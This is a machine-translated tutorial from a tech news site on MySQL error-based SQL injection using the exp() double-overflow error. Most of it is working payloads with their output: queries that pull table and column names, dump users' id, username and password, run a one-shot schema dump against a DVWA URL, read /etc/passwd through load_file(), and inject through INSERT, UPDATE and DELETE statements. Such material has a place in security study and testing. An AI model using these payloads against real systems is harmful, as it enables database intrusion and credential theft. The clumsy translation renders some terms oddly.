Shulou(Shulou.com)05/31 Report--

This article mainly shows you "how to use exp for SQL error injection", the content is simple and easy to understand, organized clearly, I hope to help you solve doubts, let Xiaobian lead you to study and learn "how to use exp for SQL error injection" this article bar.

0x01 Introduction Overview

A double overflow was found in MySQL. When we get the functions in MySQL, we are more interested in the mathematical functions, which should also contain some data types to store values. So Xiaobian ran to test to see which functions will overflow errors. The editor then discovered that the exp() function causes an overflow error when passing a value greater than 709.

mysql> select exp(709);

+-----------------------+

| exp(709) |

+-----------------------+

| 8.218407461554972e307 |

+-----------------------+

1 row in set (0.00 sec)

mysql> select exp(710);

ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

In MySQL, exp has the opposite function to ln and log. In a simple introduction, log and ln both return logarithm to base e, see equation:

mysql> select log(15);

+------------------+

| log(15) |

+------------------+

| 2.70805020110221 |

+------------------+

1 row in set (0.00 sec)

mysql> select ln(15);

+------------------+

| ln(15) |

+------------------+

| 2.70805020110221 |

+------------------+

1 row in set (0.00 sec)

Exponential function is the inverse of logarithmic function, exp() is logarithmic function with e as base, such as equation:

mysql> select exp(2.70805020110221);+-----------------------+| exp(2.70805020110221) |+-----------------------+| 15 |+-----------------------+1 row in set (0.00 sec)

0x02 Injection

When it comes to injection, we use negative queries to create the "DOUBLE value is out of range" error. As mentioned in the author's previous post, reversing 0 bitwise returns "18446744073709551615," and because the function returns 0 after successful execution, we reverse the successfully executed function to get an unsigned BIGINT value of ***.

mysql> select ~0;

+----------------------+

| ~0 |

+----------------------+

| 18446744073709551615 |

+----------------------+

1 row in set (0.00 sec)

mysql> select ~(select version());

+----------------------+

| ~(select version()) |

+----------------------+

| 18446744073709551610 |

+----------------------+

1 row in set, 1 warning (0.00 sec)

We create a DOUBLE overflow error by subquery and bitwise inversion, and inject data from it.

>`exp(~(select*from(select user())x))` mysql> select exp(~(select*from(select user())x)); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

0x03 Data injection

Get table name:

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

Get a listing:

select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));

Retrieved data:

select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));

0x04 overnight

This query dumps all tables and columns from the current context. We can also dump all the databases, but since we are extracting through an error, it will return very few results.

exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)) http://localhost/dvwa/vulnerabilities/sqli/? id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#

0x05 Read file

You can read files with the load_file() function, but the author found that there is a 13-line restriction, and the statement can also be used in BIGINT overflow injections.

select exp(~(select*from(select load_file('/etc/passwd'))a));

Note that you cannot write to a file because this error only writes zeros.

mysql> select exp(~(select*from(select 'hello')a)) into outfile 'C:/out.txt'; ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))' # type C:\out.txt 0

0x06 Injection in Insert

Just follow the rules.

mysql> insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'Eyre'); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

For all inserts, update and delete statements DIOS queries can also be used.

mysql> insert into users (id, username, password) values (2, '' | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), 'Eyre'); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000 newdb::users::id newdb::users::username newdb::users::password' from dual)))'

0x07 Injection in Update

mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4; ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

0x08 Injection in Delete

mysql> delete from users where id='1' | exp(~(select*from(select user())x)); ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

As with the previous BIGINT injections, exp injections are available for MySQL 5.5.5 and above. The previous version was silent for this situation.

mysql> select version(); +---------------------+ | version() | +---------------------+ | 5.0.45-community-nt | +---------------------+ 1 row in set (0.00 sec) mysql> select exp(710); +----------+ | exp(710) | +----------+ | 1.# INF | +----------+ 1 row in set (0.00 sec) mysql> select exp(~0); +---------+ | exp(~0) | +---------+ | 1.# INF | +---------+ 1 row in set (0.00 sec)

There may be other functions that generate this error.

The above is "how to use exp SQL error injection" all the content of this article, thank you for reading! I believe that everyone has a certain understanding, hope to share the content to help everyone, if you still want to learn more knowledge, welcome to pay attention to the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.